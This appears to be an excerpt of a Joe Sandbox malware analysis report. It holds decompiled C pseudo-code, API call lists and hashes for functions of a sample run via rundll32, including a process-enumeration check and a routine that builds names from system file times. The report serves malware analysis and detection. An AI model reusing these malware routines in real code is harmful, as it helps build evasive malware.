                                          • lstrlen.KERNEL32(?,00000000,00000000,00000027,00000005,00000000,00000000,047B2098,74666F53,00000000,?,047BD00C,?,?), ref: 047B6B2D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047B6B51
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 047B6B59
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                          • String ID: Soft
                                          • API String ID: 393707159-3753413193
                                          • Opcode ID: d0e716f1d065d68d3fcd218014ad7e7e5bca5407a5fd3fc3b7ab71b4f88e874f
                                          • Instruction ID: 36047ccb1dd073c5f3ac272780669df9cf93aeedf6d5d0a17991d82be135a518
                                          • Opcode Fuzzy Hash: d0e716f1d065d68d3fcd218014ad7e7e5bca5407a5fd3fc3b7ab71b4f88e874f
                                          • Instruction Fuzzy Hash: 6601A272100505BBDB122BA89C88FEF7B7CDF84389F148425FB8456204DB39994587E2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E047B56A2() {
                                          				char _v264;
                                          				void* _v300;
                                          				int _t8;
                                          				intOrPtr _t9;
                                          				int _t15;
                                          				void* _t17;
                                          
                                          				_t15 = 0;
                                          				_t17 = CreateToolhelp32Snapshot(2, 0);
                                          				if(_t17 != 0) {
                                          					_t8 = Process32First(_t17,  &_v300);
                                          					while(_t8 != 0) {
                                          						_t9 =  *0x47bd2a4; // 0x24fa5a8
                                          						_t2 = _t9 + 0x47bee38; // 0x73617661
                                          						_push( &_v264);
                                          						if( *0x47bd0fc() != 0) {
                                          							_t15 = 1;
                                          						} else {
                                          							_t8 = Process32Next(_t17,  &_v300);
                                          							continue;
                                          						}
                                          						L7:
                                          						CloseHandle(_t17);
                                          						goto L8;
                                          					}
                                          					goto L7;
                                          				}
                                          				L8:
                                          				return _t15;
                                          			}










                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 047B56B2
                                          • Process32First.KERNEL32(00000000,?), ref: 047B56C5
                                          • Process32Next.KERNEL32(00000000,?), ref: 047B56F1
                                          • CloseHandle.KERNEL32(00000000), ref: 047B5700
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 02b569a30ea6cc6d17c8534ca0d786f898890763e7c848ac0f6dc39d62e4e3fe
                                          • Instruction ID: 8cd6060e795fe0ca68caedbfabcbfb374b4bdae226ea8c77552c2a720d0be787
                                          • Opcode Fuzzy Hash: 02b569a30ea6cc6d17c8534ca0d786f898890763e7c848ac0f6dc39d62e4e3fe
                                          • Instruction Fuzzy Hash: 15F0BB726011657AF720B6769C48FDB77ACDBC575CF004061ED85C3240F634E94786E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E047B7283(void* __esi) {
                                          				struct _SECURITY_ATTRIBUTES* _v4;
                                          				void* _t8;
                                          				void* _t10;
                                          
                                          				_v4 = 0;
                                          				memset(__esi, 0, 0x38);
                                          				_t8 = CreateEventA(0, 1, 0, 0);
                                          				 *(__esi + 0x1c) = _t8;
                                          				if(_t8 != 0) {
                                          					_t10 = CreateEventA(0, 1, 1, 0);
                                          					 *(__esi + 0x20) = _t10;
                                          					if(_t10 == 0) {
                                          						CloseHandle( *(__esi + 0x1c));
                                          					} else {
                                          						_v4 = 1;
                                          					}
                                          				}
                                          				return _v4;
                                          			}







                                          APIs
                                          • memset.NTDLL ref: 047B7291
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,751881D0), ref: 047B72A6
                                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 047B72B3
                                          • CloseHandle.KERNEL32(?), ref: 047B72C5
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CloseHandlememset
                                          • String ID:
                                          • API String ID: 2812548120-0
                                          • Opcode ID: 462f6e98bab6f96edb39eb1e4763b0039b4163d730935a05c60ebe1b3cce1063
                                          • Instruction ID: 356292ba3eb5e7da33cd6d07ad90b0441d92b7dfe5f1f862faff3fb25802febe
                                          • Opcode Fuzzy Hash: 462f6e98bab6f96edb39eb1e4763b0039b4163d730935a05c60ebe1b3cce1063
                                          • Instruction Fuzzy Hash: 17F05EB1204708BFD310AF76DCC4DA7BBBCEB91298B118D2EF18282201D676A8044AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 68%
                                          			E047BA2EF(int __eax, char _a4) {
                                          				void* _v0;
                                          				void* _t12;
                                          				int _t13;
                                          				int _t14;
                                          
                                          				_t1 =  &_a4; // 0x4d283a53
                                          				_t14 = __eax;
                                          				__imp__( *_t1);
                                          				_t13 = __eax;
                                          				if(__eax > __eax) {
                                          					_t14 = __eax;
                                          				}
                                          				_t2 = _t14 + 1; // 0x1
                                          				_t12 = E047B58BE(_t2);
                                          				if(_t12 != 0) {
                                          					memcpy(_t12, _v0, _t13);
                                          					memset(_t12 + _t13, 0, _t14 - _t13 + 1);
                                          				}
                                          				return _t12;
                                          			}








                                          APIs
                                          • lstrlen.KERNEL32(S:(M,00000000,7748D3B0,?,047B9AA8,00000000,00000005,047BD00C,00000008,?,?,59935A40,?,?,59935A40), ref: 047BA2F8
                                          • memcpy.NTDLL(00000000,?,00000000,00000001,?,?,?,047B4A8B,?,?,?,4D283A53,?,?), ref: 047BA31B
                                          • memset.NTDLL ref: 047BA32A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpymemset
                                          • String ID: S:(M
                                          • API String ID: 4042389641-2217774225
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 50%
                                          			E047B4C3A(void** __esi) {
                                          				char* _v0;
                                          				intOrPtr _t4;
                                          				intOrPtr _t6;
                                          				void* _t8;
                                          				intOrPtr _t11;
                                          				void* _t12;
                                          				void** _t14;
                                          
                                          				_t14 = __esi;
                                          				_t4 =  *0x47bd324; // 0x6cb95b0
                                          				__imp__(_t4 + 0x40);
                                          				while(1) {
                                          					_t6 =  *0x47bd324; // 0x6cb95b0
                                          					_t1 = _t6 + 0x58; // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t8 =  *_t14;
                                          				if(_t8 != 0 && _t8 != 0x47bd030) {
                                          					HeapFree( *0x47bd238, 0, _t8);
                                          				}
                                          				_t14[1] = E047B7C75(_v0, _t14);
                                          				_t11 =  *0x47bd324; // 0x6cb95b0
                                          				_t12 = _t11 + 0x40;
                                          				__imp__(_t12);
                                          				return _t12;
                                          			}











                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(06CB9570), ref: 047B4C43
                                          • Sleep.KERNEL32(0000000A,?,?,?,047B4A8B,?,?,?,4D283A53,?,?), ref: 047B4C4D
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,047B4A8B,?,?,?,4D283A53,?,?), ref: 047B4C75
                                          • RtlLeaveCriticalSection.NTDLL(06CB9570), ref: 047B4C91
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E047B78AD() {
                                          				void* _t1;
                                          				intOrPtr _t5;
                                          				void* _t6;
                                          				void* _t7;
                                          				void* _t11;
                                          
                                          				_t1 =  *0x47bd26c; // 0x410
                                          				if(_t1 == 0) {
                                          					L8:
                                          					return 0;
                                          				}
                                          				SetEvent(_t1);
                                          				_t11 = 0x7fffffff;
                                          				while(1) {
                                          					SleepEx(0x64, 1);
                                          					_t5 =  *0x47bd2b8; // 0x0
                                          					if(_t5 == 0) {
                                          						break;
                                          					}
                                          					_t11 = _t11 - 0x64;
                                          					if(_t11 > 0) {
                                          						continue;
                                          					}
                                          					break;
                                          				}
                                          				_t6 =  *0x47bd26c; // 0x410
                                          				if(_t6 != 0) {
                                          					CloseHandle(_t6);
                                          				}
                                          				_t7 =  *0x47bd238; // 0x68c0000
                                          				if(_t7 != 0) {
                                          					HeapDestroy(_t7);
                                          				}
                                          				goto L8;
                                          			}









                                          APIs
                                          • SetEvent.KERNEL32(00000410,00000001,047B6F2D), ref: 047B78B8
                                          • SleepEx.KERNEL32(00000064,00000001), ref: 047B78C7
                                          • CloseHandle.KERNEL32(00000410), ref: 047B78E8
                                          • HeapDestroy.KERNEL32(068C0000), ref: 047B78F8
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CloseDestroyEventHandleHeapSleep
                                          • String ID:
                                          • API String ID: 4109453060-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 37%
                                          			E047B9B10() {
                                          				void* _v0;
                                          				void** _t3;
                                          				void** _t5;
                                          				void** _t7;
                                          				void** _t8;
                                          				void* _t10;
                                          
                                          				_t3 =  *0x47bd324; // 0x6cb95b0
                                          				__imp__( &(_t3[0x10]));
                                          				while(1) {
                                          					_t5 =  *0x47bd324; // 0x6cb95b0
                                          					_t1 =  &(_t5[0x16]); // 0x0
                                          					if( *_t1 == 0) {
                                          						break;
                                          					}
                                          					Sleep(0xa);
                                          				}
                                          				_t7 =  *0x47bd324; // 0x6cb95b0
                                          				_t10 =  *_t7;
                                          				if(_t10 != 0 && _t10 != 0x47be845) {
                                          					HeapFree( *0x47bd238, 0, _t10);
                                          					_t7 =  *0x47bd324; // 0x6cb95b0
                                          				}
                                          				 *_t7 = _v0;
                                          				_t8 =  &(_t7[0x10]);
                                          				__imp__(_t8);
                                          				return _t8;
                                          			}










                                          APIs
                                          • RtlEnterCriticalSection.NTDLL(06CB9570), ref: 047B9B19
                                          • Sleep.KERNEL32(0000000A,?,?,?,047B4A8B,?,?,?,4D283A53,?,?), ref: 047B9B23
                                          • HeapFree.KERNEL32(00000000,?,?,?,?,047B4A8B,?,?,?,4D283A53,?,?), ref: 047B9B51
                                          • RtlLeaveCriticalSection.NTDLL(06CB9570), ref: 047B9B66
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			E047B6B6E(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                          				intOrPtr* _v8;
                                          				void* _t17;
                                          				intOrPtr* _t22;
                                          				void* _t27;
                                          				char* _t30;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t36;
                                          				void* _t37;
                                          				void* _t39;
                                          				int _t42;
                                          
                                          				_t17 = __eax;
                                          				_t37 = 0;
                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);
                                          				_t2 = _t17 + 1; // 0x1
                                          				_t28 = _t2;
                                          				_t34 = E047B58BE(_t2);
                                          				if(_t34 != 0) {
                                          					_t30 = E047B58BE(_t28);
                                          					if(_t30 == 0) {
                                          						E047B147E(_t34);
                                          					} else {
                                          						_t39 = _a4;
                                          						_t22 = E047BA8D2(_t39);
                                          						_v8 = _t22;
                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                          							_a4 = _t39;
                                          						} else {
                                          							_t26 = _t22 + 2;
                                          							_a4 = _t22 + 2;
                                          							_t22 = E047BA8D2(_t26);
                                          							_v8 = _t22;
                                          						}
                                          						if(_t22 == 0) {
                                          							__imp__(_t34, _a4);
                                          							 *_t30 = 0x2f;
                                          							 *((char*)(_t30 + 1)) = 0;
                                          						} else {
                                          							_t42 = _t22 - _a4;
                                          							memcpy(_t34, _a4, _t42);
                                          							 *((char*)(_t34 + _t42)) = 0;
                                          							__imp__(_t30, _v8);
                                          						}
                                          						 *_a8 = _t34;
                                          						_t37 = 1;
                                          						 *_a12 = _t30;
                                          					}
                                          				}
                                          				return _t37;
                                          			}















                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,047BA006,?,?,?,?,00000102,047B66AF,?,?,00000000), ref: 047B6B7A
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                            • Part of subcall function 047BA8D2: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,047B6BA8,00000000,00000001,00000001,?,?,047BA006,?,?,?,?,00000102), ref: 047BA8E0
                                            • Part of subcall function 047BA8D2: StrChrA.SHLWAPI(?,0000003F,?,?,047BA006,?,?,?,?,00000102,047B66AF,?,?,00000000,00000000), ref: 047BA8EA
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,047BA006,?,?,?,?,00000102,047B66AF,?), ref: 047B6BD8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047B6BE8
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 047B6BF4
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E047B5FCB(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                          				void* _v8;
                                          				void* _t18;
                                          				int _t25;
                                          				int _t29;
                                          				int _t34;
                                          
                                          				_t29 = lstrlenW(_a4);
                                          				_t25 = lstrlenW(_a8);
                                          				_t18 = E047B58BE(_t25 + _t29 + _t25 + _t29 + 2);
                                          				_v8 = _t18;
                                          				if(_t18 != 0) {
                                          					_t34 = _t29 + _t29;
                                          					memcpy(_t18, _a4, _t34);
                                          					_t10 = _t25 + 2; // 0x2
                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);
                                          				}
                                          				return _v8;
                                          			}









                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,75145520,00000008,06CB937C,?,047B694E,004F0053,06CB937C,?,?,?,?,?,?,047B9C10), ref: 047B5FDB
                                          • lstrlenW.KERNEL32(047B694E,?,047B694E,004F0053,06CB937C,?,?,?,?,?,?,047B9C10), ref: 047B5FE2
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • memcpy.NTDLL(00000000,004F0053,751469A0,?,?,047B694E,004F0053,06CB937C,?,?,?,?,?,?,047B9C10), ref: 047B6002
                                          • memcpy.NTDLL(751469A0,047B694E,00000002,00000000,004F0053,751469A0,?,?,047B694E,004F0053,06CB937C), ref: 047B6015
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(?,00000000,00000000,047B5335,616D692F,00000000), ref: 047B9DFB
                                          • lstrlen.KERNEL32(?), ref: 047B9E03
                                            • Part of subcall function 047B58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,047B1C51), ref: 047B58CA
                                          • lstrcpy.KERNEL32(00000000,?), ref: 047B9E1A
                                          • lstrcat.KERNEL32(00000000,?), ref: 047B9E25
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.310457401.00000000047B1000.00000020.00020000.sdmp, Offset: 047B0000, based on PE: true
                                          • Associated: 00000006.00000002.310442068.00000000047B0000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311007103.00000000047BC000.00000002.00020000.sdmp
                                          • Associated: 00000006.00000002.311029087.00000000047BD000.00000004.00020000.sdmp
                                          • Associated: 00000006.00000002.311045014.00000000047BF000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_47b0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 6a6b8c18e313fc5eced3f4ae39bad092fabab8f52a1060e16949cb42fdacb9b6
                                          • Instruction ID: 0b8519122aa05f66ba876648f05b4705e0f18c109cf2b52a85c9a678abf9ed8e
                                          • Opcode Fuzzy Hash: 6a6b8c18e313fc5eced3f4ae39bad092fabab8f52a1060e16949cb42fdacb9b6
                                          • Instruction Fuzzy Hash: BBE01273805A21AF87126BA4AC08DDFBBA9FF892507058D1AF65093214C735D8158BD1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E04BF32BA(signed char* __eax, intOrPtr* _a4) {
                                          				signed int _v12;
                                          				void* _v16;
                                          				CHAR* _v20;
                                          				struct _FILETIME _v28;
                                          				void* _v32;
                                          				void* _v36;
                                          				char* _v40;
                                          				signed int _v44;
                                          				long _v344;
                                          				struct _WIN32_FIND_DATAA _v368;
                                          				signed int _t72;
                                          				void* _t74;
                                          				signed int _t76;
                                          				void* _t78;
                                          				intOrPtr _t81;
                                          				CHAR* _t83;
                                          				void* _t85;
                                          				signed char _t89;
                                          				signed char _t91;
                                          				intOrPtr _t93;
                                          				void* _t96;
                                          				long _t99;
                                          				int _t101;
                                          				signed int _t109;
                                          				char* _t111;
                                          				void* _t113;
                                          				int _t119;
                                          				char _t128;
                                          				void* _t134;
                                          				signed int _t136;
                                          				char* _t139;
                                          				signed int _t140;
                                          				char* _t141;
                                          				char* _t146;
                                          				signed char* _t148;
                                          				int _t151;
                                          				void* _t152;
                                          				void* _t153;
                                          				void* _t154;
                                          				void* _t165;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_t148 = __eax;
                                          				_t72 =  *0x4bfd2a0; // 0x59935a40
                                          				_t74 = RtlAllocateHeap( *0x4bfd238, 0, _t72 ^ 0x59935b44);
                                          				_v20 = _t74;
                                          				if(_t74 == 0) {
                                          					L36:
                                          					return _v12;
                                          				}
                                          				_t76 =  *0x4bfd2a0; // 0x59935a40
                                          				_t78 = RtlAllocateHeap( *0x4bfd238, 0, _t76 ^ 0x59935a4d);
                                          				_t146 = 0;
                                          				_v36 = _t78;
                                          				if(_t78 == 0) {
                                          					L35:
                                          					HeapFree( *0x4bfd238, _t146, _v20);
                                          					goto L36;
                                          				}
                                          				_t136 =  *0x4bfd2a0; // 0x59935a40
                                          				memset(_t78, 0, _t136 ^ 0x59935a4d);
                                          				_t81 =  *0x4bfd2a4; // 0x24da5a8
                                          				_t154 = _t153 + 0xc;
                                          				_t5 = _t81 + 0x4bfe7e8; // 0x73797325
                                          				_t83 = E04BF77E6(_t5);
                                          				_v20 = _t83;
                                          				if(_t83 == 0) {
                                          					L34:
                                          					HeapFree( *0x4bfd238, _t146, _v36);
                                          					goto L35;
                                          				}
                                          				_t134 = 0xffffffffffffffff;
                                          				_v28.dwLowDateTime = 0x59935a4d;
                                          				_v28.dwHighDateTime = 0x59935a4d;
                                          				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                          				_v32 = _t85;
                                          				if(_t85 != 0x59935a4d) {
                                          					GetFileTime(_t85,  &_v28, 0, 0);
                                          					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                          					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                          					FindCloseChangeNotification(_v32); // executed
                                          				}
                                          				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                          				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                          				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                          				 *_t148 = _t91;
                                          				_v32 = _t91 & 0x000000ff;
                                          				_t93 =  *0x4bfd2a4; // 0x24da5a8
                                          				_t16 = _t93 + 0x4bfe809; // 0x642e2a5c
                                          				_v40 = _t146;
                                          				_v44 = _t89 & 0x000000ff;
                                          				__imp__(_v20, _t16);
                                          				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                          				_v16 = _t96;
                                          				if(_t96 == _t134) {
                                          					_t146 = 0;
                                          					goto L34;
                                          				}
                                          				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				while(_t99 > 0) {
                                          					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                          					if(_t101 == 0) {
                                          						FindClose(_v16);
                                          						_v16 = FindFirstFileA(_v20,  &_v368);
                                          						_v28.dwHighDateTime = _v344;
                                          						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                          					}
                                          					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				}
                                          				_v12 = _v12 & 0x00000000;
                                          				while(1) {
                                          					_t109 = _v44;
                                          					if(_v12 <= _t109) {
                                          						goto L15;
                                          					}
                                          					_t140 = _v12;
                                          					if(_t140 > _v32) {
                                          						_t141 = _v36;
                                          						 *_a4 = _t141;
                                          						while(1) {
                                          							_t128 =  *_t141;
                                          							if(_t128 == 0) {
                                          								break;
                                          							}
                                          							if(_t128 < 0x30) {
                                          								 *_t141 = _t128 + 0x20;
                                          							}
                                          							_t141 = _t141 + 1;
                                          						}
                                          						_v12 = 1;
                                          						FindClose(_v16); // executed
                                          						_t146 = 0;
                                          						goto L35;
                                          					}
                                          					_t165 = _t140 - _t109;
                                          					L15:
                                          					if(_t165 == 0 || _v12 == _v32) {
                                          						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                          						_t139 = _v40;
                                          						_t151 = _t111 -  &(_v368.cFileName);
                                          						_t113 = 0;
                                          						if(_t139 != 0) {
                                          							_t48 = _t151 - 4; // -4
                                          							_t113 = _t48;
                                          							if(_t113 > _t151) {
                                          								_t113 = 0;
                                          							}
                                          						}
                                          						if(_t151 > 4) {
                                          							_t151 = 4;
                                          						}
                                          						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                          						_t154 = _t154 + 0xc;
                                          						_v40 =  &(_v40[_t151]);
                                          					}
                                          					do {
                                          						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                          						if(_t119 == 0) {
                                          							FindClose(_v16);
                                          							_v16 = FindFirstFileA(_v20,  &_v368);
                                          						}
                                          					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                          					_v12 = _v12 + 1;
                                          				}
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 04BF32E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04BF3307
                                          • memset.NTDLL ref: 04BF3321
                                            • Part of subcall function 04BF77E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,04BF333A,73797325), ref: 04BF77F7
                                            • Part of subcall function 04BF77E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04BF7811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 04BF335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04BF3373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 04BF338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04BF3396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 04BF33D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04BF33ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 04BF340B
                                          • FindNextFileA.KERNELBASE(04BF207E,?), ref: 04BF341F
                                          • FindClose.KERNEL32(04BF207E), ref: 04BF342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04BF3438
                                          • CompareFileTime.KERNEL32(?,?), ref: 04BF345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 04BF348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 04BF34C6
                                          • FindNextFileA.KERNELBASE(04BF207E,?), ref: 04BF34DB
                                          • FindClose.KERNEL32(04BF207E), ref: 04BF34E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04BF34F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 04BF3504
                                          • FindClose.KERNEL32(04BF207E), ref: 04BF3539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 04BF354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 04BF355B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp
